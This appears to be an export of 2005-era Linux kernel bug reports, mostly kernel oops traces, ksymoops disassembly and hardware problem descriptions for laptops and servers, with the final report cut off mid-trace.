localhost kernel: Buffer I/O error on device sda, logical block 306044 Jun 7 17:51:17 localhost kernel: Buffer I/O error on device sda, logical block 306045 Jun 7 17:51:17 localhost kernel: Buffer I/O error on device sda, logical block 306046 Jun 7 17:51:17 localhost kernel: Buffer I/O error on device sda, logical block 306047 Jun 7 17:51:17 localhost kernel: Buffer I/O error on device sda, logical block 306048 Jun 7 17:51:17 localhost kernel: scsi3 (0:0): rejecting I/O to offline device Jun 7 17:51:17 localhost last message repeated 3 times Jun 7 17:51:18 localhost kernel: VFS: busy inodes on changed media. Jun 7 17:51:18 localhost kernel: scsi3 (0:0): rejecting I/O to offline device Jun 7 17:51:30 localhost kernel: scsi3 (0:0): rejecting I/O to offline device Jun 7 17:51:30 localhost kernel: printk: 390 messages suppressed. Jun 7 17:51:30 localhost kernel: Buffer I/O error on device sda, logical block 95911 Jun 7 17:51:30 localhost kernel: Buffer I/O error on device sda, logical block 95912 Jun 7 17:51:30 localhost kernel: Unable to handle kernel NULL pointer dereference at virtual address 00000000 Jun 7 17:51:30 localhost kernel: printing eip: Jun 7 17:51:30 localhost kernel: c013e783 Jun 7 17:51:30 localhost kernel: *pde = 00000000 Jun 7 17:51:30 localhost kernel: Oops: 0000 [#1] Jun 7 17:51:30 localhost kernel: PREEMPT Jun 7 17:51:30 localhost kernel: Modules linked in: nls_cp437 hfsplus nls_iso8859_1 ntfs vfat fat isofs zlib_inflate nls_utf8 udf sd_mod usb_storage scsi_mod ohci_hcd ehci_hcd visor usbserial orinoco_usb firmware_class orinoco pcmcia parport_pc lp parport 8250_pci 8250 serial_core snd_intel8x0 snd_ac97_codec snd_pcm_oss snd_mixer_oss snd_pcm snd_timer snd soundcore snd_page_alloc pci_hotplug usbcore e100 mii yenta_socket rsrc_nonstatic pcmcia_core ide_cd cdrom joydev evdev Jun 7 17:51:30 localhost kernel: CPU: 0 Jun 7 17:51:30 localhost kernel: EIP: 0060:[mark_page_accessed+3/64] Not tainted VLI Jun 7 17:51:30 localhost kernel: EFLAGS: 00010203 (2.6.12-rc5) Jun 7 17:51:30 localhost kernel: EIP is at mark_page_accessed+0x3/0x40 Jun 7 17:51:30 localhost kernel: eax: 00000000 ebx: 00000000 ecx: d58eab48 edx: d6abc000 Jun 7 17:51:30 localhost kernel: esi: d58eab20 edi: c2bc4800 ebp: c2bc4800 esp: d6abd898 Jun 7 17:51:30 localhost kernel: ds: 007b es: 007b ss: 0068 Jun 7 17:51:30 localhost kernel: Process gtkpod (pid: 8313, threadinfo=d6abc000 task=de4440a0) Jun 7 17:51:30 localhost kernel: Stack: 00000001 e0c0b33a 00000282 00000000 00000000 d58eab20 d58eab20 d6abc000 Jun 7 17:51:30 localhost kernel: 00000099 e0c0af12 00000000 c01130fa c03ae0a0 c864f414 c864f3e0 0000006c Jun 7 17:51:30 localhost kernel: c864f3e0 d6abdb90 c864f414 00000008 0000006c c864f3e0 00000008 e0c0c194 Jun 7 17:51:30 localhost kernel: Call Trace: Jun 7 17:51:30 localhost kernel: [pg0+545514298/1069749248] hfsplus_bnode_put+0xca/0xe0 [hfsplus] Jun 7 17:51:30 localhost kernel: [pg0+545513234/1069749248] hfsplus_bnode_find+0xf2/0x2b0 [hfsplus] Jun 7 17:51:30 localhost kernel: [activate_task+90/112] activate_task+0x5a/0x70 Jun 7 17:51:30 localhost kernel: [pg0+545517972/1069749248] __hplusfs_brec_find+0x84/0x130 [hfsplus] Jun 7 17:51:30 localhost kernel: [pg0+545514298/1069749248] hfsplus_bnode_put+0xca/0xe0 [hfsplus] Jun 7 17:51:30 localhost kernel: [pg0+545518235/1069749248] hfsplus_brec_find+0x5b/0x140 [hfsplus] Jun 7 17:51:30 localhost kernel: [ide_map_sg+144/160] ide_map_sg+0x90/0xa0 Jun 7 17:51:30 localhost kernel: [pg0+545518490/1069749248] hfsplus_brec_read+0x1a/0x50 [hfsplus] Jun 7 17:51:30 localhost kernel: [pg0+545502527/1069749248] hfsplus_find_cat+0x2f/0x90 [hfsplus] Jun 7 17:51:30 localhost kernel: [ide_dma_exec_cmd+32/48] ide_dma_exec_cmd+0x20/0x30 Jun 7 17:51:30 localhost kernel: [ide_dma_start+33/48] ide_dma_start+0x21/0x30 Jun 7 17:51:30 localhost kernel: [__ide_do_rw_disk+723/1104] __ide_do_rw_disk+0x2d3/0x450 Jun 7 17:51:30 localhost kernel: [as_move_to_dispatch+236/480] as_move_to_dispatch+0xec/0x1e0 Jun 7 17:51:30 localhost kernel: [scheduler_tick+26/896] scheduler_tick+0x1a/0x380 Jun 7 17:51:30 localhost kernel: [scheduler_tick+26/896] scheduler_tick+0x1a/0x380 Jun 7 17:51:30 localhost kernel: [do_get_write_access+604/1344] do_get_write_access+0x25c/0x540 Jun 7 17:51:30 localhost kernel: [mempool_alloc+107/256] mempool_alloc+0x6b/0x100 Jun 7 17:51:30 localhost kernel: [autoremove_wake_function+0/80] autoremove_wake_function+0x0/0x50 Jun 7 17:51:30 localhost kernel: [as_update_arq+30/112] as_update_arq+0x1e/0x70 Jun 7 17:51:30 localhost kernel: [as_add_request+365/448] as_add_request+0x16d/0x1c0 Jun 7 17:51:30 localhost kernel: [__elv_add_request+115/192] __elv_add_request+0x73/0xc0 Jun 7 17:51:30 localhost kernel: [__make_request+643/1152] __make_request+0x283/0x480 Jun 7 17:51:30 localhost kernel: [pg0+545513033/1069749248] hfsplus_bnode_find+0x29/0x2b0 [hfsplus] Jun 7 17:51:30 localhost kernel: [pg0+545517972/1069749248] __hplusfs_brec_find+0x84/0x130 [hfsplus] Jun 7 17:51:30 localhost kernel: [pg0+545517722/1069749248] hfsplus_find_init+0x2a/0x60 [hfsplus] Jun 7 17:51:30 localhost kernel: [pg0+545489064/1069749248] hfsplus_read_inode+0x98/0x150 [hfsplus] Jun 7 17:51:30 localhost kernel: [pg0+545504706/1069749248] hfsplus_lookup+0x192/0x1f0 [hfsplus] Jun 7 17:51:30 localhost kernel: [prep_new_page+85/96] prep_new_page+0x55/0x60 Jun 7 17:51:30 localhost kernel: [buffered_rmqueue+253/496] buffered_rmqueue+0xfd/0x1f0 Jun 7 17:51:30 localhost kernel: [do_no_page+92/768] do_no_page+0x5c/0x300 Jun 7 17:51:30 localhost kernel: [do_get_write_access+604/1344] do_get_write_access+0x25c/0x540 Jun 7 17:51:30 localhost kernel: [recalc_task_prio+135/320] recalc_task_prio+0x87/0x140 Jun 7 17:51:30 localhost kernel: [__journal_file_buffer+414/672] __journal_file_buffer+0x19e/0x2a0 Jun 7 17:51:30 localhost kernel: [do_get_write_access+604/1344] do_get_write_access+0x25c/0x540 Jun 7 17:51:30 localhost kernel: [__journal_file_buffer+414/672] __journal_file_buffer+0x19e/0x2a0 Jun 7 17:51:30 localhost kernel: [journal_dirty_metadata+335/560] journal_dirty_metadata+0x14f/0x230 Jun 7 17:51:30 localhost kernel: [dput+30/528] dput+0x1e/0x210 Jun 7 17:51:30 localhost kernel: [dput+30/528] dput+0x1e/0x210 Jun 7 17:51:30 localhost kernel: [__link_path_walk+2573/3408] __link_path_walk+0xa0d/0xd50 Jun 7 17:51:30 localhost kernel: [journal_stop+364/608] journal_stop+0x16c/0x260 Jun 7 17:51:30 localhost kernel: [d_alloc+27/384] d_alloc+0x1b/0x180 Jun 7 17:51:30 localhost kernel: [real_lookup+174/208] real_lookup+0xae/0xd0 Jun 7 17:51:30 localhost kernel: [do_lookup+126/144] do_lookup+0x7e/0x90 Jun 7 17:51:30 localhost kernel: [__link_path_walk+1719/3408] __link_path_walk+0x6b7/0xd50 Jun 7 17:51:30 localhost kernel: [link_path_walk+69/208] link_path_walk+0x45/0xd0 Jun 7 17:51:30 localhost kernel: [__do_softirq+121/144] __do_softirq+0x79/0x90 Jun 7 17:51:30 localhost kernel: [path_lookup+124/320] path_lookup+0x7c/0x140 Jun 7 17:51:30 localhost kernel: [__user_walk+47/96] __user_walk+0x2f/0x60 Jun 7 17:51:30 localhost kernel: [sys_access+132/320] sys_access+0x84/0x140 Jun 7 17:51:30 localhost kernel: [__do_softirq+121/144] __do_softirq+0x79/0x90 Jun 7 17:51:30 localhost kernel: [sysenter_past_esp+84/117] sysenter_past_esp+0x54/0x75 Jun 7 17:51:30 localhost kernel: Code: b8 38 00 00 00 89 51 04 ba 01 00 00 00 ff 86 e8 00 00 00 89 8e d0 00 00 00 e8 aa bd ff ff e9 74 ff ff ff 90 8d 74 26 00 53 89 c3 &lt;8b&gt; 00 a8 40 75 17 8b 03 a8 04 74 11 8b 03 a8 20 75 17 8d 74 26 Jun 7 17:51:30 localhost kernel: &lt;6&gt;note: gtkpod[8313] exited with preempt_count 1 Jun 7 17:51:30 localhost kernel: scsi3 (0:0): rejecting I/O to offline device The output of ksymoops is: ksymoops 2.4.9 on i686 2.6.12-rc5. Options used -V (default) -k /proc/ksyms (default) -l /proc/modules (default) -o /lib/modules/2.6.12-rc5/ (default) -m /boot/System.map-2.6.12-rc5 (default) Warning: You did not tell me where to find symbol information. I will assume that the log matches the kernel and modules that are running right now and I'll use the default options above for symbol resolution. If the current kernel and/or modules do not match the log, you can get more accurate output by telling me the kernel version and where to find map, modules, ksyms etc. ksymoops -h explains the options. Error (regular_file): read_ksyms stat /proc/ksyms failed No modules in ksyms, skipping objects No ksyms, skipping lsmod Jun 7 17:51:30 localhost kernel: Unable to handle kernel NULL pointer dereference at virtual address 00000000 Jun 7 17:51:30 localhost kernel: c013e783 Jun 7 17:51:30 localhost kernel: *pde = 00000000 Jun 7 17:51:30 localhost kernel: Oops: 0000 [#1] Jun 7 17:51:30 localhost kernel: CPU: 0 Jun 7 17:51:30 localhost kernel: EIP: 0060:[mark_page_accessed+3/64] Not tainted VLI Jun 7 17:51:30 localhost kernel: EFLAGS: 00010203 (2.6.12-rc5) Jun 7 17:51:30 localhost kernel: eax: 00000000 ebx: 00000000 ecx: d58eab48 edx: d6abc000 Jun 7 17:51:30 localhost kernel: esi: d58eab20 edi: c2bc4800 ebp: c2bc4800 esp: d6abd898 Jun 7 17:51:30 localhost kernel: ds: 007b es: 007b ss: 0068 Jun 7 17:51:30 localhost kernel: Stack: 00000001 e0c0b33a 00000282 00000000 00000000 d58eab20 d58eab20 d6abc000 Jun 7 17:51:30 localhost kernel: 00000099 e0c0af12 00000000 c01130fa c03ae0a0 c864f414 c864f3e0 0000006c Jun 7 17:51:30 localhost kernel: c864f3e0 d6abdb90 c864f414 00000008 0000006c c864f3e0 00000008 e0c0c194 Jun 7 17:51:30 localhost kernel: Call Trace: Warning (Oops_read): Code line not seen, dumping what data is available &gt;&gt;ecx; d58eab48 &lt;pg0+1551db48/3fc31400&gt; &gt;&gt;edx; d6abc000 &lt;pg0+166ef000/3fc31400&gt; &gt;&gt;esi; d58eab20 &lt;pg0+1551db20/3fc31400&gt; &gt;&gt;edi; c2bc4800 &lt;pg0+27f7800/3fc31400&gt; &gt;&gt;ebp; c2bc4800 &lt;pg0+27f7800/3fc31400&gt; &gt;&gt;esp; d6abd898 &lt;pg0+166f0898/3fc31400&gt; Jun 7 17:51:30 localhost kernel: Code: b8 38 00 00 00 89 51 04 ba 01 00 00 00 ff 86 e8 00 00 00 89 8e d0 00 00 00 e8 aa bd ff ff e9 74 ff ff ff 90 8d 74 26 00 53 89 c3 &lt;8b&gt; 00 a8 40 75 17 8b 03 a8 04 74 11 8b 03 a8 20 75 17 8d 74 26 Using defaults from ksymoops -t elf32-i386 -a i386 Code; ffffffd5 &lt;__kernel_rt_sigreturn+1b95/????&gt; 00000000 &lt;_EIP&gt;: Code; ffffffd5 &lt;__kernel_rt_sigreturn+1b95/????&gt; 0: b8 38 00 00 00 mov $0x38,%eax Code; ffffffda &lt;__kernel_rt_sigreturn+1b9a/????&gt; 5: 89 51 04 mov %edx,0x4(%ecx) Code; ffffffdd &lt;__kernel_rt_sigreturn+1b9d/????&gt; 8: ba 01 00 00 00 mov $0x1,%edx Code; ffffffe2 &lt;__kernel_rt_sigreturn+1ba2/????&gt; d: ff 86 e8 00 00 00 incl 0xe8(%esi) Code; ffffffe8 &lt;__kernel_rt_sigreturn+1ba8/????&gt; 13: 89 8e d0 00 00 00 mov %ecx,0xd0(%esi) Code; ffffffee &lt;__kernel_rt_sigreturn+1bae/????&gt; 19: e8 aa bd ff ff call ffffbdc8 &lt;_EIP+0xffffbdc8&gt; Code; fffffff3 &lt;__kernel_rt_sigreturn+1bb3/????&gt; 1e: e9 74 ff ff ff jmp ffffff97 &lt;_EIP+0xffffff97&gt; Code; fffffff8 &lt;__kernel_rt_sigreturn+1bb8/????&gt; 23: 90 nop Code; fffffff9 &lt;__kernel_rt_sigreturn+1bb9/????&gt; 24: 8d 74 26 00 lea 0x0(%esi),%esi Code; fffffffd &lt;__kernel_rt_sigreturn+1bbd/????&gt; 28: 53 push %ebx Code; fffffffe &lt;__kernel_rt_sigreturn+1bbe/????&gt; 29: 89 c3 mov %eax,%ebx Code; 00000000 Before first symbol 2b: 8b 00 mov (%eax),%eax Code; 00000002 Before first symbol 2d: a8 40 test $0x40,%al Code; 00000004 Before first symbol 2f: 75 17 jne 48 &lt;_EIP+0x48&gt; Code; 00000006 Before first symbol 31: 8b 03 mov (%ebx),%eax Code; 00000008 Before first symbol 33: a8 04 test $0x4,%al Code; 0000000a Before first symbol 35: 74 11 je 48 &lt;_EIP+0x48&gt; Code; 0000000c Before first symbol 37: 8b 03 mov (%ebx),%eax Code; 0000000e Before first symbol 39: a8 20 test $0x20,%al Code; 00000010 Before first symbol 3b: 75 17 jne 54 &lt;_EIP+0x54&gt; Code; 00000012 Before first symbol 3d: 8d .byte 0x8d Code; 00000013 Before first symbol 3e: 74 26 je 66 &lt;_EIP+0x66&gt; 2 warnings and 1 error issued. Results may not be reliable.</t>
  </si>
  <si>
    <t>/dev/hdc doesn't appear when inserting ultrabay cd-rom</t>
  </si>
  <si>
    <t>2005-06-10 04:51 UTC</t>
  </si>
  <si>
    <t>Eugene Pavlovsky</t>
  </si>
  <si>
    <t>2008-03-05 15:44 UTC</t>
  </si>
  <si>
    <t>Distribution: gentoo 2005.1 Hardware Environment: ibm thinkpad r51 Problem Description: if i boot my system without ultrabay cd-rom plugged in, then plug it in, the /dev/hdc device node doesn't appear (neither does anything appear in the kernel log). trying to access a device node created by mknod gives "no such device or address". if i boot my system with the cd-rom plugged in, it works, even after i unplug and plug it in again. building ide-cd as a module and reloading it doesn't detect my cd-rom (if it was plugged in after boot). right now, i'm using a "hdc=cdrom" kernel parameter to work around this problem, and it works (but gives me a whole lot of IDE warnings when booting without cd-rom). this stuff should be hotpluggable! Steps to reproduce: boot my thinkpad r51 without the cd drive in ultrabay insert the cd drive in ultrabay - nothing happens. expected: message in the kernel log that my cd-rom is detected, /dev/hdc appearing</t>
  </si>
  <si>
    <t>kaccountsend</t>
  </si>
  <si>
    <t>Oops: 0002 [#1] Unable to handle kernel paging request at virtual address 2d646d2f</t>
  </si>
  <si>
    <t>kernel - 2.6.12-rc6-mm1</t>
  </si>
  <si>
    <t>2005-06-11 23:30 UTC</t>
  </si>
  <si>
    <t>2005-08-06 01:47 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian Sarge Hardware Environment: laptop samsung nv5000 Software Environment:kernel Problem Description: Unable to handle kernel paging request at virtual address 2d646d2f printing eip: c018fcbb *pde = 00000000 Oops: 0002 [#1] Modules linked in: evdev pcspkr i2c_piix4 i2c_core ntfs CPU: 0 EIP: 0060:[&lt;c018fcbb&gt;] Not tainted VLI EFLAGS: 00010202 (2.6.12-rc6-mm1) EIP is at sysfs_release+0x3b/0x90 eax: 00000001 ebx: 2d646c2f ecx: c11c43c0 edx: 00000001 esi: c69c8a68 edi: c1342da0 ebp: c7fe4ec0 esp: c6a6ff58 ds: 007b es: 007b ss: 0068 Process udev (pid: 3152, threadinfo=c6a6e000 task=c73750a0) Stack: c69c8a68 00000010 c7130c40 c6a02de4 c015884b c6a02de4 c7130c40 00000000 00000000 c6e7f86c c7130c40 c7fc8ba0 00000000 c6a6e000 c0156e1d c7130c40 c7fc8ba0 c7130c40 00000003 080c6f48 c0156ea0 c7130c40 c7fc8ba0 00000003 Call Trace: [&lt;c015884b&gt;] __fput+0x16b/0x180 [&lt;c0156e1d&gt;] filp_close+0x4d/0x80 [&lt;c0156ea0&gt;] sys_close+0x50/0x60 [&lt;c0102f6f&gt;] sysenter_past_esp+0x54/0x75 Code: 7c 24 0c 8b 51 08 8b 79 78 8b 42 0c 8b 40 48 8b 70 14 8b 42 48 85 f6 8b 40 14 8b 58 04 74 08 89 34 24 e8 09 40 0a 00 85 db 74 0b &lt;ff&gt; 8b 00 01 00 00 83 3b 02 74 33 85 ff 74 0f 8b 47 0c 85 c0 75 Steps to reproduce:</t>
  </si>
  <si>
    <t>cardbus fault to start</t>
  </si>
  <si>
    <t>2.6.12-rc6-mm1</t>
  </si>
  <si>
    <t>2005-06-12 01:19 UTC</t>
  </si>
  <si>
    <t>2005-06-30 13:52 UTC</t>
  </si>
  <si>
    <t>4766 4775 4783</t>
  </si>
  <si>
    <t>Distribution: Debian Sarge Hardware Environment: laptop samsung nv5000 ; CardBus bridge: Texas Instruments PCI1410 Software Environment: kernel 2.6.12-rc6-mm1 Problem Description: syslog output kernel 2.6.12-rc6: Jun 12 10:08:36 lopi cardmgr[3333]: watching 1 socket Jun 12 10:08:36 lopi kernel: cs: IO port probe 0x100-0x4ff: excluding 0x200-0x207 0x398-0x39f 0x4d0-0x4d7 Jun 12 10:08:36 lopi kernel: cs: IO port probe 0x800-0x8ff: clean. Jun 12 10:08:36 lopi kernel: cs: IO port probe 0xc00-0xcff: clean. Jun 12 10:08:36 lopi kernel: cs: IO port probe 0xa00-0xaff: clean. Jun 12 10:08:36 lopi cardmgr[3334]: starting, version is 3.2.5 Jun 12 10:08:37 lopi authdaemond.plain: modules="authpam", daemons=5 syslog output kernel 2.6.12-rc6-mm1: Jun 12 10:03:39 lopi cardmgr[3374]: watching 1 socket Jun 12 10:03:39 lopi cardmgr[3374]: could not adjust resource: IO ports 0x100-0x4ff: Input/output error Jun 12 10:03:39 lopi cardmgr[3374]: could not adjust resource: IO ports 0x800-0x8ff: Input/output error Jun 12 10:03:39 lopi cardmgr[3374]: could not adjust resource: IO ports 0xc00-0xcff: Input/output error Jun 12 10:03:39 lopi cardmgr[3374]: could not adjust resource: memory 0xc0000-0xfffff: Input/output error Jun 12 10:03:39 lopi cardmgr[3374]: could not adjust resource: memory 0xa0000000-0xa0ffffff: Input/output error Jun 12 10:03:39 lopi cardmgr[3374]: could not adjust resource: memory 0x60000000-0x60ffffff: Input/output error Jun 12 10:03:39 lopi cardmgr[3374]: could not adjust resource: IO ports 0xa00-0xaff: Input/output error Jun 12 10:03:39 lopi cardmgr[3375]: starting, version is 3.2.5 Jun 12 10:03:39 lopi authdaemond.plain: modules="authpam", daemons=5</t>
  </si>
  <si>
    <t>intel865: Cannot remap FB region.</t>
  </si>
  <si>
    <t>2.6.12-rc6</t>
  </si>
  <si>
    <t>2005-06-12 05:27 UTC</t>
  </si>
  <si>
    <t>2005-10-31 00:12 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian Sarge Hardware Environment: P4,1GB RAM,Intel D865GBF Desktop Board, only integrated graphics card Software Environment: X-server4.3.0 Problem Description: i can't load intelfb module Steps to reproduce: rmmod intelfb - if module loaded modprobe intelfb // module i830 is loaded</t>
  </si>
  <si>
    <t>Avoid loading of ACPI tables twice - fix attached</t>
  </si>
  <si>
    <t>2005-06-14 08:25 UTC</t>
  </si>
  <si>
    <t>2007-03-07 22:48 UTC</t>
  </si>
  <si>
    <t>I recently posted this on the ACPI list, but no response... Could someone verify if this is the right way to solve this. Is the ACPI code (explicitly loading the SSDT in DSDT code) allowed? I searched the APCI spec a bit and I think it is. I have a machine with following DSDT code: Processor (CPU1, 0x01, 0x00000810, 0x06) { OperationRegion (SSDT, SystemMemory, 0x1DFD4050, 0x03CC) ... Method (_PDC, 1, NotSerialized) { ... Load (SSDT, HNDL) ... } } The machine works fine using acpi-cpufreq. If loading the speedstep-centrino module is tried, the _PDC function is invoked and the SSDT is loaded a second time which results in: linux kernel: ACPI: CPU0 (power states: C1[C1] C2[C2]) linux kernel: ACPI: Processor [CPU1] (supports 8 throttling states) linux kernel: dswload-0294: *** Error: Looking up [ACST] in namespace, AE_ALREADY_EXISTS linux kernel: psparse-0601 [20] ps_parse_loop : During name lookup/catalog, AE_ALREADY_EXISTS linux kernel: psparse-1140: *** Error: Method execution failed [\_PR_.CPU1._PDC] (Node ddfcd3a8), AE_ALREADY_EXISTS and a kernel freeze with different backtraces later: linux kernel: Unable to handle kernel paging request at virtual address XYZ The attached patch worksarounds/fixes this problem on this machine. Could someone have a look at it, please. Thanks.</t>
  </si>
  <si>
    <t>Jesse Brandeburg</t>
  </si>
  <si>
    <t>kernel panic (oops) when accessing &gt; 40,000 files on an  ext3 filesystem</t>
  </si>
  <si>
    <t>2.6.11.12</t>
  </si>
  <si>
    <t>2005-06-14 14:19 UTC</t>
  </si>
  <si>
    <t>2005-07-21 05:33 UTC</t>
  </si>
  <si>
    <t>Distribution: (self - from linuxfromscratch.org) Hardware Environment: Dell Poweredge 1850, 1 CPU hyper threading enabled. Software Environment: (ver_linux output) Linux hostname 2.6.11.11 #1 SMP Thu Jun 9 01:31:03 PDT 2005 i686 pentium4 i386 GNU/Linux Gnu C &lt;no gnu c present&gt;, built with gcc 3.4.4 binutils 2.16 util-linux 2.12q mount 2.12q module-init-tools 3.1 e2fsprogs 1.37 reiserfsprogs 3.6.19 reiser4progs line Linux C Library 2.3.5 Dynamic linker (ldd) 2.3.5 Procps 3.2.5 Net-tools 1.60 Kbd 1.12 Sh-utils 5.2.1 udev 030 Modules Loaded hostname# cat /proc/cpuinfo processor : 0 vendor_id : GenuineIntel cpu family : 15 model : 4 model name : Intel(R) Pentium(R) 4 CPU 3.20GHz stepping : 1 cpu MHz : 3201.040 cache size : 1024 KB physical id : 0 siblings : 2 fdiv_bug : no hlt_bug : no f00f_bug : no coma_bug : no fpu : yes fpu_exception : yes cpuid level : 5 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe pni monitor ds_cpl cid xtpr bogomips : 6324.22 processor : 1 vendor_id : GenuineIntel cpu family : 15 model : 4 model name : Intel(R) Pentium(R) 4 CPU 3.20GHz stepping : 1 cpu MHz : 3201.040 cache size : 1024 KB physical id : 0 siblings : 2 fdiv_bug : no hlt_bug : no f00f_bug : no coma_bug : no fpu : yes fpu_exception : yes cpuid level : 5 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe pni monitor ds_cpl cid xtpr bogomips : 6389.76 Problem Description: Kernel panic (oops) happens on a lightly loaded system. Details about the load can be provided if necessary. Oops output will be attached to this bug shortly. Steps to reproduce: Have at least 40,000 files on an EXT3 partition that are being accessed, modified, deleted, etc. in a light load environment.</t>
  </si>
  <si>
    <t>loading of acpi processor.ko module hangs/freezes system instantly</t>
  </si>
  <si>
    <t>2005-06-19 16:35 UTC</t>
  </si>
  <si>
    <t>Samuel Berner</t>
  </si>
  <si>
    <t>2005-08-03 20:26 UTC</t>
  </si>
  <si>
    <t>Distribution: Gentoo Linux (Vanilla Kernel) Hardware Environment: Architecture: X86 Name: Clevo 5600D CPU: Pentium4 2.8 GHz, 533MHz FSB This is a Laptop I bought in December 2002. It was sold under many brands like Sager/Eurocom/Alienware/Promedion 56XX and 888X, Alienware m51, Littlebit 64X) Software Environment: not really relevant here, I think. Problem Description: Somewhere in February/March 2004 I first tried to build a kernel with working ACPI support. The standard kernel, freezed at startup when ACPI was enabled. I then used the acpi-20040211-2.4.25.diff patch and I got a working kernel with ACPI working perfectly. In November/December 2004 I tried first to upgrade to 2.6 (2.6.9 maybe), both unpatched and patched with the newest ACPI patches led to a system freeze during system boot. I also tried the same with a 2.4 kernel which gave me the same results. As I hadn't too much time back then, I just used the old patch again, which still worked on a gentoo-sources-2.4.25 (instead of a vanilla kernel). Now I have some time and I'd like to solve problem finally: The first what I did, was downloading one of the latests vanilla kernels (2.6.11.11) through portage (gentoo package management tool). I still freezed on startup (except if I passed the kernel parameter acpi=off). I changed the kernel config to turn as many options as possible into modules. So I got the modules ac.ko, button.ko, battery.ko, processor.ko and thermal.ko. Booting the system worked fine now, including ACPI support. Then I inserted one module after the other. First ac, then button, then battery and all worked well until here (I tested them all over the /proc interface, they all worked like in my previous kernel, I also found no suspicous lines in the syslog (most useful kernel and all ACPI debugging options were compiled in)) When I inserted the processor.ko module the system freezed instantly (before I could type any further characters on the terminal, but a new shell prompt was there). Steps to reproduce: 1. Boot up system with processor acpi support compiled into a module 2. load processor.ko module 3. System has freezed instantly. As it seems to me. The problem in the acpi cpu code, that makes my laptop freeze, was very likely introduced sometime in 2004. I have good experience in C (and also C++), but none in kernel programming. So I would look at the source if you could give me some hints where the problem most likely could be found (and maybe where I could find some general kernel debugging tips). Thank you for any help.</t>
  </si>
  <si>
    <t>libata-core Kernel Crash</t>
  </si>
  <si>
    <t>2.6.12</t>
  </si>
  <si>
    <t>2005-06-20 01:19 UTC</t>
  </si>
  <si>
    <t>Oliver Pahl</t>
  </si>
  <si>
    <t>2005-08-01 11:46 UTC</t>
  </si>
  <si>
    <t>Distribution: Gentoo Stage 1 Hardware Environment: Toshiba Satellite M40 / Pentium M 1.6 Ghz, 80 GB Serial Ata, 128 MB Ati Radeon X600, 1024 MB Ram Software Environment: Gentoo 2005/Q2 Problem Description: http://www.toshsoft.de/cinestar/pict0020.jpg &lt;- ScreenShot Steps to reproduce: Compiled libata into the Kernel. Rebooted...</t>
  </si>
  <si>
    <t>Screen appears at mid-right section</t>
  </si>
  <si>
    <t>2005-06-20 18:49 UTC</t>
  </si>
  <si>
    <t>Vincent Fortier</t>
  </si>
  <si>
    <t>2005-08-10 17:35 UTC</t>
  </si>
  <si>
    <t>Distribution: fedora core 3 Hardware Environment: dell latitude d800 (nvidia go 5650) Software Environment: xor 6.8.2 + kde 3.4.1 (kde for redhat project) Problem Description: At boot time the screen appears moved to the mid right portion of the actual video pannel making the end of the line appears at the left edge... It simply looks like moved half way to the right Steps to reproduce: compile a vanilla 2.6.12 with only thoses fb options: CONFIG_FB=y CONFIG_FB_CFB_FILLRECT=y CONFIG_FB_CFB_COPYAREA=y CONFIG_FB_CFB_IMAGEBLIT=y CONFIG_FB_SOFT_CURSOR=y CONFIG_FB_MODE_HELPERS=y CONFIG_FB_TILEBLITTING=y CONFIG_VIDEO_SELECT=y CONFIG_FB_NVIDIA=y CONFIG_FB_NVIDIA_I2C=y</t>
  </si>
  <si>
    <t>while booting the kernel with DB2AUTOSTART encountered these oops message.</t>
  </si>
  <si>
    <t>2.6.12-mm1</t>
  </si>
  <si>
    <t>2005-06-21 03:25 UTC</t>
  </si>
  <si>
    <t>2005-06-26 16:24 UTC</t>
  </si>
  <si>
    <t>Dipankar Sarma</t>
  </si>
  <si>
    <t>Distribution: SLES 9 SP1 ----------------------------------- Hardware Environment: 2way, Intel(R) XEON(TM) CPU 2.00GHz Ethernet controller: Broadcom Corporation NetXtreme BCM5703X Gigabit Ethernet SCSI storage controller: LSI Logic / Symbios Logic 53c1030 PCI-X Fusion-MPT Dual Ultra320 SCSI ----------------------------------- Software Environment: Linux x335a 2.6.12-mm1-I #1 SMP Tue Jun 21 12:02:51 IST 2005 i686 i686 i386 GNU/Linux ----------------------------------- Problem Description: While booting into the kernel 2.6.12-mm1 encountered oops message. Since DB2AUTOSTART is set to ON, so it gave the following error message. The bug can be easily repeated by starting db2. From my observation it seems like the error has occured while running fs/fcntl.c code. OOPs message is [ 127.001827] ------------[ cut here ]------------ [ 127.016985] kernel BUG at &lt;bad filename&gt;:57323! [ 127.031863] invalid operand: 0000 [#1] [ 127.044169] PREEMPT SMP DEBUG_PAGEALLOC [ 127.056842] Modules linked in: [ 127.066891] CPU: 0 [ 127.066892] EIP: 0060:[&lt;c0169697&gt;] Not tainted VLI [ 127.066894] EFLAGS: 00010282 (2.6.12-mm1-I) [ 127.106392] EIP is at fd_install+0x57/0x60 [ 127.119836] eax: f3c82580 ebx: f605dd80 ecx: 00000001 edx: f4b9c480 [ 127.142142] esi: f605dd84 edi: 000003c0 ebp: f520bf54 esp: f520bf44 [ 127.164446] ds: 007b es: 007b ss: 0068 [ 127.177898] Process db2sysc (pid: 11883, threadinfo=f520a000 task=f7d14020) [ 127.200199] Stack: f3e22380 000003c0 f605dd84 f4b9c480 f520bf74 c017d984 f605dd80 f3e22380 [ 127.227879] 000003c0 ffffffea fffffff7 00000000 f520bf90 c017de6d f3e22380 000003c0 [ 127.255560] 00000005 f3e22380 fffffff7 f520bfb4 c017dff2 00000005 00000000 000003c0 [ 127.283241] Call Trace: [ 127.291861] [&lt;c010414b&gt;] show_stack+0xab/0xc0 [ 127.306505] [&lt;c01042e4&gt;] show_registers+0x164/0x1d0 [ 127.322865] [&lt;c010450d&gt;] die+0x10d/0x1b0 [ 127.336081] [&lt;c0104639&gt;] do_trap+0x89/0xd0 [ 127.349869] [&lt;c01049b8&gt;] do_invalid_op+0xb8/0xd0 [ 127.365373] [&lt;c0103d53&gt;] error_code+0x4f/0x54 [ 127.380043] [&lt;c017d984&gt;] dupfd+0x64/0xa0 [ 127.393258] [&lt;c017de6d&gt;] do_fcntl+0x16d/0x210 [ 127.407903] [&lt;c017dff2&gt;] sys_fcntl64+0x82/0xa0 [ 127.422836] [&lt;c01031bf&gt;] sysenter_past_esp+0x54/0x75 [ 127.439477] Code: 00 8b 53 0c 8b 42 0c 8b 04 b8 85 c0 75 1d 8b 42 0c 8b 55 f0 89 14 